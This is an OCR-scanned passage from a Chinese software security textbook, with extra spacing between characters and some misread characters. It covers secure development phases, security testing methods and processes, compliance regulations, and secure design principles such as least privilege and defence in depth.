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信息 。 有 时 ， 机 密 性 和 完整 性 是 交 迭 的 

4) 系统 的 可 控 性 (Controlability): 攻击 者 利用 漏洞 对 授权 机 构 控制 信息 的 机 密 性 造成 
危害 ; 
5) 系统 的 可 靠 性 (Reliability): 攻击 者 利用 漏洞 对 用 户 认 可 的 质量 特性 造成 危害 漏洞 的 
危害 是 多 方面 的 。 近 年 来 许多 突 发 的 、 大 规模 的 网 络 安全 事件 多 数 都 是 由 于 漏洞 导致 的 。 


1.4 软件 安全 技术 与 标准 
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随 着 计算 机 技术 的 不 断 发 展 ， 互 联网 应 用 无 处 不 在 ， 随 之 而 来 的 是 安全 与 隐私 的 防护 问 
题 。 从 新 闻 到 报刊 杂志 ， 有 关 计 算 机 安全 的 报道 屡见不鲜 ， 往 往 引发 此 类 安全 问题 的 原因 就 
在 于 恶意 攻击 ， 而 令 恶意 攻击 得 退 的 原因 就 在 于 软件 的 安全 功能 不 够 完善 。 

开发 一 款 安全 功能 完善 的 软件 ， 通 常 需要 涉及 计算 机 技术 中 的 方方面面 : 缓冲 区 溢出 、 
访问 控制 、 竞 争 条 件 、 随 机 性 和 确定 性 、 密 码 学 的 应 用 、 认 证 及 身份 验证 技术 、 网 络 安全 、 
数据 库 安 全 、 客 户 端 安全 以 及 防火 墙 技术 等 。 

从 软件 开发 周期 进行 分 析 ， 软 件 安全 开发 可 划分 为 以 下 几 个 阶段 : 

1. 安全 需求 分 析 (需求 阶段 ) 


安全 需求 分 析 是 在 需求 分 析 阶 段 ， 要 识别 和 维护 哪些 是 安全 的 需求 ， 哪 些 是 不 安全 的 需 
求 ， 从 而 从 需求 中 除去 威胁 。 
2. 体系 结构 风险 分 析 (设计 阶段 ) 


体系 结构 风险 分 析 是 在 考虑 到 50% 的 软件 安全 问题 是 有 设计 瑕 钼 引起 的 ， 因 此 需要 
对 设计 和 说 明 书 进行 审核 分 析 。 它 要 求 在 系统 设计 和 构造 系统 框架 时 ， 设 计 者 、 构 架 师 和 分 
析 人 员 都 要 非常 清晰 地 文档 化 所 有 假定 的 和 已 经 识别 的 风险 。 安 全 分 析 人 员 揭 示 体 系 结构 瑕 
犹 ， 对 它们 评级 ， 并 开始 进行 降低 风险 的 活动 。 在 基于 特定 架构 设计 阶段 和 不 同 的 类 的 设计 
阶段 ， 风 险 分 析 非 常 必 要 。 并 且 在 整个 开发 生命 周期 中 采用 一 致 的 风险 管理 进行 软件 的 风险 
登记 、 修 改 、 跟 踪 。 

3 代码 审核 (代码 阶段 ) 

代码 审核 是 在 代码 级 上 关注 代码 实现 可 能 带 来 的 软件 安全 漏洞 以 及 代码 编写 标准 遵循 
的 情况 (所 有 的 软件 项 目 有 一 个 共同 的 工件 -一 源 代码 。 大 量 的 安全 问题 都 是 由 可 以 在 代码 中 
发 现 的 简单 缺陷 引起 的 , 例如 缓冲 区 溢出 漏洞 与 SQL 注入 漏洞 。 代码 审 核 就 是 为 了 查找 和 修 
复 存 在 于 源 代码 中 的 缺陷 。 代 码 审核 可 以 手工 审核 或 者 使 用 静态 分 析 工 具 进行 审核 。 静 态 分 
析 工 具 审核 速度 快 ， 并 不 需要 操作 人 员 具 有 丰富 的 安全 专业 知识 )。 
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4. 基于 风险 的 安全 测试 (测试 计划 阶段 ) 


基于 风险 的 安全 测试 是 在 单元 级 和 系统 级 开展 的 ， 一 般 采 用 两 种 策略 : 首先 ， 测 试 安全 
功能 以 标准 的 功能 测试 为 基础 ; 然后 , 基于 风险 的 安全 测试 是 以 攻击 模式 (Attach Patterns), JX 
险 分 析 结 果 、 用 例 滥用 (Abuse Cases) 为 基础 。 
用 例 滥用 是 在 需求 分 析 和 用 例 (Use Cases) 设 计 阶 段 要 考虑 的 问题 。 此 时 ， 软 件 开发 人 员 
倾向 于 根据 系统 在 一 切 条 件 满足 的 情况 下 的 表现 来 描述 软件 需求 ， 这 将 导致 以 正确 的 使 用 为 
前 提 而 描述 系统 的 规范 行为 。 如 果 系统 被 人 有 意 滥 用 ， 为 了 开发 出 安全 、 可 靠 的 软件 ， 就 必 
须 设法 预测 异常 行为 。 例 如 : 对 于 一 个 工资 支付 系统 ， 可 能 有 这 样 的 用 例 “ 系 统 人 允许 HR 管 
理 部 门 的 用 户 查看 和 修改 所 有 员工 的 工资 ”、“ 系 统 只 允许 基本 用 户 查 看 自己 的 工资 ”。 但 
是 对 于 潜在 攻击 者 ， 可 能 会 试图 获取 工资 支付 系统 中 的 特别 权限 ， 以 删除 所 有 欺诈 交易 的 证 
据 ; 或 者 攻击 者 设法 将 工资 支付 推迟 几 天 以 挪用 由 推迟 产生 的 利息 。 因 此 ， 为 开发 安全 的 软 
件 ， 需 要 像 恶 劣 攻 击 者 一 样 思考 问题 。 

5 渗透 测试 (测试 执行 阶段 ) 

渗透 测试 是 一 种 “ 反 向 测试 ”， 即 系统 在 真实 环境 下 ， 安 全 工程 师 尽 可 能 完整 地 模拟 黑 
客 使 用 的 漏洞 发 现 技术 和 攻击 手段 ， 对 目标 网 络 、 系 统 主机 、 应 用 的 安全 性 进行 深入 的 探测 ， 
发 现 系 统 最 脆弱 的 环节 的 过 程 。 渗 透 测 试 能 够 直观 地 让 管理 人 员 知 道 自己 网 络 所 面临 的 问题 。 
渗透 测试 最 适合 于 发 掘 配置 问题 和 其 他 对 软件 安全 影响 较 大 的 环境 因素 。 

6. 安全 操作 (实施 阶段 ) 


安全 操作 是 在 系统 的 应 用 阶段 ， 软 件 安全 受益 于 网 络 安全 的 操作 ， 对 于 恶意 攻击 性 的 炒 
作 ， 要 能 够 有 足够 的 日 志 信息 去 起 诉 已 经 知道 的 攻击 。 
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1. 软件 安全 测试 概述 


IEEE 对 软件 测试 给 出 的 定义 是 : “使 用 人 工 或 自动 手段 来 运行 或 测定 某 个 系统 ， 其 目 
的 在 于 检测 该 系统 是 否 满足 规定 的 需求 ， 或 者 弄 清 预期 的 结果 与 实际 结果 的 差别 。” 因 此 ， 
软件 测试 的 目的 是 发 现 软件 中 的 错误 ， 并 在 交付 用 户 使 用 前 消除 这 些 错误 ， 这 几乎 成 为 一 个 
公认 的 概念 。 

软件 安全 测试 是 软件 测试 整体 框架 下 的 一 部 分 ， 侧 重 于 查找 软件 自身 程序 设计 中 存在 的 
安全 隐患 ， 并 检查 应 用 软件 对 非法 侵入 的 防范 能 力 。 不 同 的 安全 指标 其 测试 策略 是 不 同 的 。 
需要 强调 的 是 : 安全 测试 并 不 最 终 证 明 应 用 软件 是 安全 的 ， 而 是 用 于 验证 所 设立 策略 的 有 效 
性 ， 这 些 对 策 是 基于 威胁 分 析 阶 段 所 做 的 假设 而 选择 的 。 例 如 ， 测 试 应 用 软件 在 防止 非 授权 
的 内 部 或 外 部 用 户 的 访问 或 故意 破坏 等 情况 时 的 运作 。 

依据 上 述 分 析 , 软件 安全 测试 (Security Testing) 是 用 来 验证 集成 在 软件 内 的 保护 机 制 是 否 
能 够 在 实际 中 保护 系统 免 受 非 法 的 侵入 ， 在 测试 软件 系统 中 对 程序 的 危险 防止 和 危险 处 理 进 
行 的 有 效 性 测试 和 验证 ， 它 是 有 关 验 证 应 用 软件 的 安全 等 级 和 识别 潜在 安全 缺陷 的 过 程 。 
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2. 软件 安全 测试 的 必要 性 


安全 测试 是 在 充分 考虑 软件 安全 性 问题 的 前 提 下 进行 的 测试 ， 普 通 的 软件 测试 的 主要 目 
的 是 : 确保 软件 不 会 去 完成 没有 预先 设计 的 功能 , 确保 软件 能 够 完成 预先 设计 的 功能 。 但 是 ， 
安全 测试 更 有 针对 性 ， 同 时 可 能 采用 一 些 和 普通 测试 不 一 样 的 测试 手段 ， 如 攻击 和 反攻 击 技 
术 。 因 此 ， 实 际 上 ， 安 全 测试 就 是 一 轮 多 角度 、 全 方位 的 攻击 和 反攻 击 ， 目 的 就 是 要 抢 在 攻 
击 者 之 前 尽 可 能 多 地 找到 软件 中 的 漏洞 ， 以 减少 软件 遭 到 攻击 的 可 能 性 。 

安全 测试 基于 软件 需求 说 明 书 中 关于 安全 性 的 功能 需求 说 明 ， 测 试 的 内 容 主 要 是 : 软件 
的 安全 功能 实现 是 否 与 安全 需求 一 致 。 通 常情 况 下 ， 软 件 的 安全 需求 包括 : 数据 保密 和 完整 
可 用 ; 通信 过 程 中 的 身份 验证 、 授 权 、 访 问 控制 ; 通信 方 的 不 可 抵赖 ， 隐 私 保护 、 安 全 管理 ; 
软件 运行 过 程 中 的 安全 漏洞 等 。 

以 Web 站 点 为 例 ， 需 要 考虑 的 方面 包括 程序 本 身 的 安全 、 系 统 安全 、 数 据 库 安全 和 性 
能 安全 。 其 中 程序 本 身 的 安全 内 容 包括 用 户 权限 划分 是 否 得 当 、 用 户 权 限 改变 是 否 会 造成 混 
乱 、 用 户 数据 是 否 会 混淆 、 用 户 密码 是 否 可 以 用 某 些 手段 得 知 、 系 统 可 否 有 后 门 登 录 、 是 否 
进行 了 session 检查 、 是 否 有 SQL 注入 和 跨 站 脚本 等 隐患 。 

因此 ， 软 件 安全 测试 和 一 般 测试 有 很 大 的 区 别 。 一 般 测 试 主要 是 确定 软件 的 功能 能 否 达 
到 ， 如 果 没 有 达到 ， 就 进行 修改 ， 其 任务 具有 一 定 的 确定 性 。 但 是 ， 安 全 测试 主要 是 检查 软 
件 实现 的 功能 是 否 安 全 可 靠 ， 需 要 证 明 的 是 软件 不 会 出 现 安全 方面 的 问题 ， 如 数据 算 改 、 非 
授权 访问 、 遭 受 DDoS 攻击 等 。 

3. 软件 安全 测试 方法 


有 许多 的 测试 手段 可 以 进行 安全 测试 ， 目 前 主要 安全 测试 方法 有 : 

。 静态 的 代码 安全 测试 ， 主 要 通过 对 源 代码 进行 安全 扫描 ， 根 据 程序 中 数据 流 、 控 制 
流 、 语 义 等 信息 与 其 特有 软件 安全 规则 库 进行 匹配 ， 从 中 找 出 代码 中 潜在 的 安全 
漏洞 。 

。 动态 的 渗透 测试 ， 渗透 测试 也 是 常用 的 安全 测试 方法 。 是 使 用 自动 化 工具 或 者 人 工 
的 方法 模拟 黑客 的 输入 ， 对 应 用 系统 进行 攻击 性 测试 ， 从 中 找 出 运行 时 刻 所 存在 的 
安全 漏洞 。 

。 程序 数据 扫描 : 一 个 有 高 安全 需求 的 软件 ， 在 运行 过 程 中 数据 是 不 能 遭 到 破坏 的 ， 
否则 就 会 导致 缓冲 区 溢出 类 型 的 攻击 。 数 据 扫描 的 手段 通常 是 进行 内 存 测试 ， 内 存 
测试 可 以 发 现 许多 诸如 缓冲 区 溢出 之 类 的 漏洞 ， 而 这 类 漏洞 使 用 除 此 之 外 的 测试 手 
段 都 难以 发 现 。 

安全 测试 内 容 


安全 测试 内 容 很 多 ， 但 主要 测试 内 容 有 : 

。 功能 验证 ;功能 验证 是 采用 软件 测试 中 的 “ 黑 盒 ”测试 方法 ， 对 涉及 安全 的 软件 功 
能 ， 如 用 户 管理 模块 、 权 限 管理 、 加 密 系 统 、 认 证 系统 等 进行 测试 ， 主 要 验证 上 述 
功能 是 否 有 效 。 对 安全 的 功能 验证 可 以 采用 与 一 般 的 程序 功能 测试 相似 的 方法 ， 如 
黑 盒 测试 方法 、 白 盒 测 试 方法 或 灰 盒 测试 方法 等 用 例 来 进行 测试 。 
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。 漏洞 扫描 : 安全 漏洞 扫描 主要 是 借助 于 特定 的 漏洞 扫描 器 完成 的 。 通 过 使 用 漏洞 扫 
描 器 ， 系 统管 理 员 能 够 发 现 系统 存在 的 安全 漏洞 ， 从 而 在 系统 安全 中 及 时 修补 漏洞 。 
一 般 漏洞 扫描 分 为 两 种 类 型 : 四 主机 漏洞 扫描 器 是 指 在 系统 本 地 运行 检测 系统 漏洞 
的 程序 ， @ 网 络 漏洞 扫描 器 是 指 基于 网 络 远程 检测 目标 网 络 和 主机 系统 漏洞 的 程序 。 

。 模拟 攻击 :对 于 安全 测试 来 说 ， 模 拟 攻击 测试 是 一 组 特殊 的 极端 的 测试 方法 ， 我 们 
以 模拟 攻击 来 验证 软件 系统 的 安全 防护 能 力 。 模 拟 攻击 主要 的 攻击 技术 分 为 ，@ 服 
务 拒绝 型 攻击 (企图 通过 使 服务 器 崩溃 来 阻止 提供 服务 ， 是 最 容易 实施 的 攻击 行为 ， 
主要 包括 死亡 之 ping、 泪 滴 、UDP 洪水 、SYN 洪水 .Land 攻击 、 Smurf 攻击 、Fraggle 
攻击 、 电 子 邮件 炸弹 、 畸 形 消息 攻击 ); @ 漏 洞 木马 型 攻击 (主要 是 由 于 系统 使 用 者 已 
知 系统 漏洞 未 及 时 打 补 丁 或 者 不 小 心安 放 了 木马 等 原因 导致 的 非法 入 侵 行为 ， 主 要 
包括 口令 猜测 、 特 洛 伊 木 马 和 缓冲 区 溢出 ); @ 伪 装 欺骗 型 攻击 (这 类 攻击 是 使 目标 配 
置 不 正确 的 消息 ， 攻 击 技术 主要 包括 DNS 高 速 缓存 污染 、ARP 欺骗 和 IP 欺骗 )。 

o WIER: 也 称 网 络 监 听 。 可 以 获取 网 络 上 传输 的 信息 ， 而 这 些 信息 并 不 是 发 给 自 
己 的 。 网 络 侦 听 技术 是 一 个 常用 的 手段 。 可 以 有 效 地 管理 网 络 、 诊 断 网 络 问题 、 检 
查 网 络 的 安全 威胁 。 目 前 网 络 侦 听 工具 有 多 种 ， 有 硬件 ， 也 有 软件 的 。 测 评 人 员 为 
了 评测 信息 系统 的 安全 环境 ， 熟 悉 网 络 侦 听 技术 ， 使 用 侦 听 技术 是 一 种 有 效 的 安全 
测试 方法 。 

4. 软件 安全 测试 的 过 程 


软件 的 安全 测试 ， 一 般 根据 设计 阶段 的 威胁 模型 来 实施 。 应 该 从 设计 阶段 就 开始 考虑 安 
全 问题 ， 设 计 要 尽 可 能 完善 ， 可 采用 威胁 建 模 的 方法 在 软件 设计 阶段 加 入 安全 因素 的 考量 。 
威胁 建 模 过 程 一 般 如 下 : 在 项 目 组 中 成 立 一 个 小 组 ， 该 小 组 中 的 人 员 是 项 目 组 中 对 安全 问题 
比较 了 解 的 人 ;站 在 安全 角度 ， 分 解 系统 的 安全 需求 ， 确定 系统 可 能 面临 的 威胁 ， 将 威胁 进 
行 分 类 ， 可 以 画 出 威胁 树 ; 选择 应 付 威胁 或 缓和 威胁 的 方法 ; 确定 最 终 解决 这 些 威胁 的 技术 。 
既然 在 设计 阶段 ， 就 将 系统 可 能 出 现 的 一 些 安全 问题 写 在 文档 里 了 ， 因 此 安全 测试 也 应 该 基 
于 这 些 内 容 。 软 件 安全 测试 的 过 程 可 分 为 以 下 几 个 步骤 : 

1) 基于 前 面 设 计 阶段 制定 的 威胁 模型 ， 设 计 测试 计划 。 该 过 程 一 般 基于 威胁 树 ， 以 用 户 
口令 安全 问题 威胁 树 为 例 ， 测 试 计划 可 基于 口令 安全 可 能 遭受 的 各 个 攻击 进行 制定 。 

2) 将 安全 测试 的 最 小 组 件 单位 进行 划分 ， 并 确定 组 件 的 输入 格式 。 实 际 上 , 与 传统 的 测 
试 不 同 ， 威 胁 模 型 中 ， 并 不 是 所 有 的 模块 都 会 有 安全 问题 ， 因 此 只 需要 将 需要 安全 测试 的 某 
一 部 分 程序 取出 来 进行 测试 ， 对 安全 测试 的 最 小 组 件 单位 进行 划分 。 此 外 ， 每 个 组 件 都 提供 
了 接口 ， 也 就 是 输入 ， 在 测试 阶段 ， 测 试用 例 需要 进行 输入 ， 这 就 必须 将 每 个 接口 的 输入 类 
型 、 输 入 格式 等 都 列 出 来 ， 以 便 制定 测试 用 例 。 这 些 输入 的 例子 有 Socket 数据 、 无 线 数据 、 
命令 行 、 语 音 设 备 、 串 口 和 HITP 提交 等 。 

3) 根据 各 个 接口 可 能 遇 到 的 威胁 或 系统 的 潜在 漏洞 ， 对 接口 进行 分 级 。 在 该 步骤 中 , E 
要 是 确定 系统 将 要 受到 的 威胁 的 严重 性 ， 将 比较 严重 的 威胁 进行 优先 测试 ， 对 严重 性 的 判断 
应 该 源 于 威胁 模型 。 可 以 通过 很 多 方法 对 接口 受到 的 威胁 性 进行 分 级 ， 例 如 ， 存 在 一 种 积分 
制 方法 ， 对 各 个 接口 可 能 受到 的 各 种 威胁 进行 积分 ， 最 后 累加 ， 优 先 测试 那些 分 数 排 在 前 面 
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的 接口 。 

4) 确定 输入 数据 ， 设 计 测 试用 例 。 每 个 接口 可 以 输入 的 数据 都 不 相同 ， 由 于 安全 测试 不 
同 于 普通 的 测试 , 因此 还 要 更 加 精心 地 设计 测试 用 例 。 有 时 候 还 要 精心 设计 输入 的 数据 结构 ， 
如 随机 数 、 集 合 等 的 设计 ， 都 必须 是 为 安全 测试 服务 的 。 在 测试 用 例 的 设计 过 程 中 ， 安 全 测 
试 实际 上 是 对 程序 进行 的 安全 攻击 。 因 此 ， 不 但 数据 本 身 需要 精心 设计 ， 测 试 方案 也 要 精心 
设计 。 例如 在 对 缓冲 区 溢出 的 测试 中 ,必须 精 心 设计 各 种 输入 ， 从 不 同方 面 对 程序 进行 攻击 。 
如 上 面 网 站 中 可 以 设计 的 测试 用 例 内 容 如 下 : 针对 用 户 权 限 划分 的 测试 ， 使 用 各 种 权限 登录 
并 操作 的 方案 ， 针 对 用 户 密码 的 测试 ， 使 用 猜测 密码 ， 查 看 数据 库 密码 保存 的 方案 ， 针 对 系 
统 可 否 有 后 门 登录 的 测试 ， 使 用 尝试 各 种 登录 方法 的 方案 ; 针对 session 检查 的 测试 ， 使 用 不 
登录 进行 操作 的 方案 ， 针 对 DDoS 攻击 的 测试 ， 使 用 反复 进行 DDoS 攻击 的 方案 ;针对 木马 
注入 的 测试 ， 使 用 注入 木马 的 方案 ， 针 对 防火 墙 和 杀毒 软件 的 测试 ， 使 用 注入 病毒 的 方案 ; 
针对 系统 数据 可 备份 和 恢复 能 力 的 测试 ， 使 用 数据 破坏 的 方案 ， 针对 保证 每 周 7 天 、 每 天 24 
小 时 连续 工作 的 测试 ， 使 用 持续 运行 足够 时 间 的 方案 。 

5) 攻击 应 用 程序 ， 查 看 效果 。 用 设计 的 测试 用 例 攻 击 应 用 程序 ， 使 得 系统 处 于 一 种 受到 
威胁 的 状态 ， 得 到 输出 。 

6) 总 结 测试 结果 ， 提 出 解决 方案 。 本 过 程 中 ,将 预期 输出 和 实际 输出 进行 比较 ,得 出 结 
论 ， 写 出 测试 报告 ， 最 后 提交 给 相应 的 人 员 ， 解 决 错误 。 

以 上 是 一 般 的 测试 过 程 。 近 年 来 ， 在 软件 安全 性 测试 领域 还 出 现 了 一 些 研究 成 果 ， 使 用 
计算 机 来 进行 自动 测试 ， 这 些 成 果 主要 包括 以 下 4 个 方面 : 

1) 用 形式 化 方法 执行 安全 测试 , 该 方法 用 状态 迁移 系统 描述 软件 的 行为 , 将 软件 的 功能 
用 计算 迪 辑 和 迪 辑 演算 来 表达 ， 通 过 逻辑 上 的 推理 和 搜索 来 发 现 软 件 漏洞 。 

2) 基于 模型 的 安全 功能 测试 , 在 该 方法 中 ,首先 对 软件 的 结构 和 功能 进行 建 模 ， 生 成 测 
试 模型 ， 然 后 利用 测试 模型 导出 测试 用 例 。 该 方法 成 功 与 否 取决 于 建 模 的 准确 性 ， 对 身份 验 
证 、 访 问 控制 等 情况 下 的 安全 测试 比较 适用 。 常 用 模型 有 UML 模型 和 马尔 可 夫 链 模型 等 。 

3) 基于 输入 语法 进行 测试 。 接 口 的 输入 语法 ,定义 了 软件 接受 的 输入 数据 的 类 型 、 格 式 
等 。 该 类 方法 中 ， 首 先 提取 被 测 接口 的 输入 语法 ， 如 命令 行 、 文 件 、 环 境 变 量 、 套 接 字 等 ， 
然后 根据 这 些 语法 ， 生 成 测试 用 例 。 此 类 测试 方法 比较 适用 于 被 测 软件 有 较 明确 的 接口 语法 
的 情况 ， 范 围 较 罕 。 

4) 采用 随机 方法 进行 测试 。 该 方法 又 称 为 模糊 测试 , 将 随机 的 不 合法 数据 输入 到 程序 中 ， 
有 时 能 发 现 一 些 意 想不到 的 错误 ， 在 安全 性 测试 中 越 来 越 受 到 重视 。 

软件 测试 是 软件 工程 中 研究 比较 活跃 的 一 个 分 支 ， 针对 安全 测试 的 研究 也 受到 较 多 学 者 
的 重视 。 有 关 一 些 安全 测试 方面 的 最 新 进展 ， 读 者 可 以 参考 相关 文献 。 比 较 热门 的 方向 包括 
权限 系统 的 自动 测试 、 形 式 化 方法 对 测试 用 例 的 表达 、 分 布 式 环境 下 的 测试 和 云 计算 环境 下 
的 测试 等 。 
143 ”软件 安全 相关 标准 


在 项 目 起 始 阶段 ， 必 须 考虑 软件 需要 遵守 的 安全 规则 和 规章 。 在 项 目 实施 阶段 ， 必 须 遵 
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循 软件 安全 的 原则 。 本 节 最 后 将 介绍 与 软件 安全 相关 的 国际 标准 。 
1. 安全 规则 与 规章 


一 些 相关 规章 包括 : 符合 Web 应 用 程序 安全 标准 (WASS)， 服 从 HIPPAA 隐私 和 安全 规 
章 ， 或 满足 联邦 信息 安全 管理 法 案 (FISMA) 标 准 ， 或 需要 满足 支付 卡 行业 数据 安全 标准 
(Payment Card Industry Data Security Standard) ， 或 遵守 金融 现代 化 条 例 (The Graham- 
Leech-Bliley) 以 及 GRC(Governance Risk management and Compliance), PCl(Payment Card 
Industry), SOX(Sarbanes-Oxley Act, SOK 法 案 ) 相 关 标 准 。 


2. 软件 安全 的 原则 


类 似 密码 学 领域 的 安全 原则 Kohoff: 密码 系统 的 安全 性 应 该 建立 在 只 是 对 密 钥 的 保密 之 
上 ， 即 假定 攻击 者 是 知道 加 密 算法 的 。 软 件 安全 方面 也 有 一 些 相 应 的 指导 原则 。 


原则 1: 让 最 弱 的 环节 变 得 安全 

首先 使 得 安全 性 最 薄弱 的 环节 变 得 安全 。 安 全 实践 者 通常 认为 :安全 是 一 个 链条 ， 其 安 
全 性 由 最 弱 之 处 决定 。 软 件 的 安全 由 最 弱 的 组 件 决定 。 攻 击 者 选择 系统 中 最 弱 的 地 方 攻击 ， 
因为 那里 最 容易 攻破 。 攻 击 者 最 可 能 攻击 一 个 软件 系统 中 的 一 个 弱点 ， 而 不 是 试图 穿 透 一 条 
坚固 的 防线 。 例 如 一 些 密码 算法 需要 很 多 年 的 时 间 攻 破 ， 因 此 攻击 者 不 会 攻击 一 个 网 络 中 
的 加 密 信道 ， 取 而 代 之 ， 一 个 通信 端点 可 能 更 容易 攻破 。 知 道 软件 弱点 何 时 被 加 固 ， 意 味 软 
件 开发 者 知道 软件 能 否 足 够 安全 地 发 布 。 


原则 2: 实践 纵深 防御 

分 层 的 安全 防御 措施 能 够 减少 攻击 的 成 功 概率 。 使 用 元 余 的 安全 机 制 使 得 攻击 者 难以 攻 
克 所 有 的 防御 机 制 。 例 如 软件 系统 使 用 认证 检查 来 防止 攻击 者 穿 透 防火 墙 。 使 用 多 层 防 御 
能 够 阻止 单一 失效 点 的 发 生 ， 单 一 失效 点 往往 也 是 承担 所 有 安全 防御 任务 的 安全 焦点 。 


原则 3: 安全 的 错误 退出 

当 系 统 发 生 错 误 时 ， 系 统 应 该 安全 地 退出 。 通常 包括 以 下 儿 点 : 安全 的 默认 设置 (如 停止 
被 访问 ); 撤消 前 面 的 操作 直到 恢复 到 安全 状态 ; 检查 错误 返回 值 等 。 系 统 的 私密 性 和 完整 性 
应 该 继续 保持 ， 即 使 是 可 用 性 已 经 被 破坏 。 在 系统 失效 期 间 ， 攻 击 者 必须 不 被 允许 访问 需要 
特殊 权限 访问 的 对 象 ,由 于 系统 在 失效 期 间 给 潜在 攻击 者 透露 的 敏感 信息 可 能 导致 新 的 攻击 ， 
因此 必须 正确 定义 系统 失效 时 的 行为 。 任 何 复杂 的 系统 都 应 该 有 错误 模式 。 错 误 是 无 法 避免 
的 , 应 该 事先 计划 的 是 当 错 误 发 生 时 哪些 安全 问题 需要 避免 。 当 有 很 多 系统 发 生 各 种 错误 时 ， 
可 能 表现 出 不 安全 的 行为 。 这 样 ， 攻 击 者 只 需要 导致 错误 ， 或 者 等 待 错误 的 发 生 ， 然 后 就 可 
以 根据 系统 在 错误 处 理 时 的 不 安全 行为 发 起 攻击 。 


原则 4: 最 小 权限 原则 

仅 将 所 需 权限 的 最 小 集 授权 给 需要 访问 资源 的 主体 ， 并 且 权限 的 持续 时 间 应 该 尽量 短 。 
给 用 户 不 必要 的 (过 多 的 ) 权 限 通常 导致 信息 被 泄漏 和 不 必要 的 改变 。 因 此 ， 精 准 的 访问 权限 
分 配 将 减少 对 系统 的 破坏 。 
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原则 5: 权限 分 离 原则 

权限 分 离 原则 的 解释 是 : 可 行 的 情况 下 ， 保 护 机 制 需要 两 个 钥匙 来 开 一 把 锁 将 比 使 用 一 
把 钥匙 要 更 加 可 靠 和 灵活 。 这 一 观察 早 在 1973 年 便 由 R. Needham 提出 。 基 本 思想 是 : 一 旦 
被 锁 ， 这 两 把 “钥匙 ”可 以 是 由 物理 上 分 离 的 或 是 完全 不 同 的 程序 来 负责 。 从 此 将 没有 单一 
的 偶然 事件 、 伪 装 或 受托 人 单方 违背 而 造成 对 保护 信息 的 损害 。 这 条 原则 经 常用 于 银行 安全 
保险 箱 ， 同 时 在 核武 器 防御 系统 上 也 有 应 用 ， 只 有 两 个 不 同 的 人 同时 给 出 了 正确 的 命令 时 导 
弹 才 能 被 发 射 。 在 计算 机 系统 中 ， 分 离 “ 钥 匙 ”是 指 当 两 个 或 两 个 以 上 的 条 件 满足 时 访问 才 
能 被 允许 。 系 统 在 授权 访问 某 个 对 象 时 应 该 确保 多 个 条 件 得 到 满足 ， 通 过 检查 单一 条 件 来 决 
定 是 否 访问 对 强 安全 性 来 说 不 够 充分 。 如 果 攻 击 者 能 够 获得 一 个 特权 但 没有 第 二 个 ， 将 不 能 
发 起 有 效 攻击 。 如 果 软 件 系统 主要 由 一 个 组 件 组 成 ， 那 么 使 用 多 种 检查 措施 访问 不 同 组 件 的 
想法 将 无 法 实现 。 


原则 6: 保护 机 制 的 经 济 性 

评价 系统 安全 时 的 一 个 因素 是 复杂 性 。 如 果 设 计 、 实 现 安全 机 制 非常 复杂 ， 那 么 安全 纶 
点 存在 的 可 能 性 将 会 增加 。 复 杂 系 统 中 的 微妙 问题 可 能 很 难 发 现 ， 特 别 是 在 有 大 量 代码 存在 
的 情况 下 。 一 个 策略 是 使 用 控制 点 来 简化 代码 ， 使 用 公共 的 功能 函数 能 减少 代码 数量 ， 程 序 
设计 者 和 开发 人 员 都 应 该 设法 使 系统 尽量 简化 。 尽 可 能 考虑 重用 组 件 ， 只 要 被 重用 的 组 件 是 
高 质量 的 就 建议 这 样 做 。 如 果 成 功 地 应 用 组 件 ， 代 码 量 就 会 减少 。 这 种 思想 特别 适用 于 密码 
库 。 在 已 有 大 量 可 用 的 密码 库 的 情况 下 ， 不 必 重 新 实现 AES 或 SHA-1。 被 广泛 使 用 的 密码 
库 要 比 组 织 内 部 使 用 的 密码 库 更 健壮 。 当 然 ， 即 使 是 被 广泛 使 用 的 组 件 ， 也 可 能 出 现 问 题 。 


原则 7: 最 小 共性 机 制 

避免 多 个 主体 通过 共享 机 制 有 权 使 用 同一 资源 。 例 如 ， 互 联网 上 的 服务 应 用 程序 同时 允 
许 攻击 者 和 用 户 获 得 访问 权 。 敏 感 信息 可 能 通过 这 种 机 制 在 不 同 用户 之 间 共 享 。 不 同 的 机 制 
对 不 同 的 主体 提供 灵活 的 访问 控制 ， 防 止 只 有 一 种 机 制 实现 时 的 可 能 出 现 的 安全 问题 。 


原则 8: 勉强 信任 原则 

开发 者 应 该 认为 他 们 系统 所 在 的 环境 是 不 安全 的 。 无 论 是 外 部 系统 、 代 码 、 人 员 等 ， 都 
应 该 被 时 刻 关注 。 当 开发 一 个 应 用 程序 时 ， 软 件 工程 师 应 该 预先 考虑 未 知 用 户 输入 的 所 有 可 
能 情况 。 即 使 用 户 是 已 知 的 ， 也 要 怀疑 其 可 能 发 起 社会 工程 攻击 ， 也 要 把 他 们 的 威胁 加 以 考 
虑 ， 没 有 系统 是 完全 安全 的 ， 所 以 两 个 系统 之 间 的 接口 应 该 紧 固 。 最 小 化 对 其 他 系统 的 信任 
可 以 加 强 自身 应 用 程序 的 安全 性 。 


原则 9: 秘密 的 不 安全 性 假设 

应 该 始终 假设 ， 攻 击 者 能 够 获得 关于 系统 的 足够 信息 并 且 发 起 攻击 。 汇 编 和 反 编译 器 等 
可 以 帮助 攻击 者 获得 可 能 存储 在 二 进 制 文件 中 的 敏感 信息 。 同 样 ， 内 部 攻击 可 能 是 偶然 的 或 
恶意 的 ， 并 将 导致 敏感 信息 被 利用 。 使 用 成 熟 的 保护 机 制 来 保证 敏感 信息 的 机 密 性 。 


原则 10: 完全 仲裁 
当主 体 请 求 访问 时 ， 软 件 系统 需要 检查 每 个 对 象 ， 特 别 是 关系 重大 的 对 象 ， 减 小 错误 的 
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授权 导致 主体 权限 提升 的 机 会 。 系 统 检查 主体 对 象 的 访问 许可 仅 有 一 次 的 话 ， 将 被 攻击 者 利 
用 ， 应 该 在 每 次 访问 时 都 检查 。 如 果 主 体 的 访问 控制 权限 在 第 一 次 授权 后 减少 了 ， 并 且 系统 
没有 在 第 二 次 访问 时 检查 ， 就 发 生 了 一 次 访问 权限 违例 。 短 时 间 保 存 权限 信息 可 以 提高 系统 
性 能 ， 但 可 能 付出 越权 访问 的 代价 。 


原则 11: 心理 接受 能 

安全 机 制 不 应 该 阻止 资源 的 可 访问 性 ， 如 果 安全 机 制 阻 碍 资源 的 可 用 性 和 可 访问 性 ， 上 
户 可 能 选择 关闭 这 些 机 制 。 在 可 能 的 情况 下 , 安全 机 制 对 系统 用 户 应 该 是 透明 的 或 只 有 极 小 
的 使 用 阻碍 。 安 全 机 制 应 该 对 用 户 很 “友好 ”， 从 而 让 用 户 便利 使 用 ， 方 便 用 户 对 程序 的 
理解 。 


原则 12: 保护 隐私 

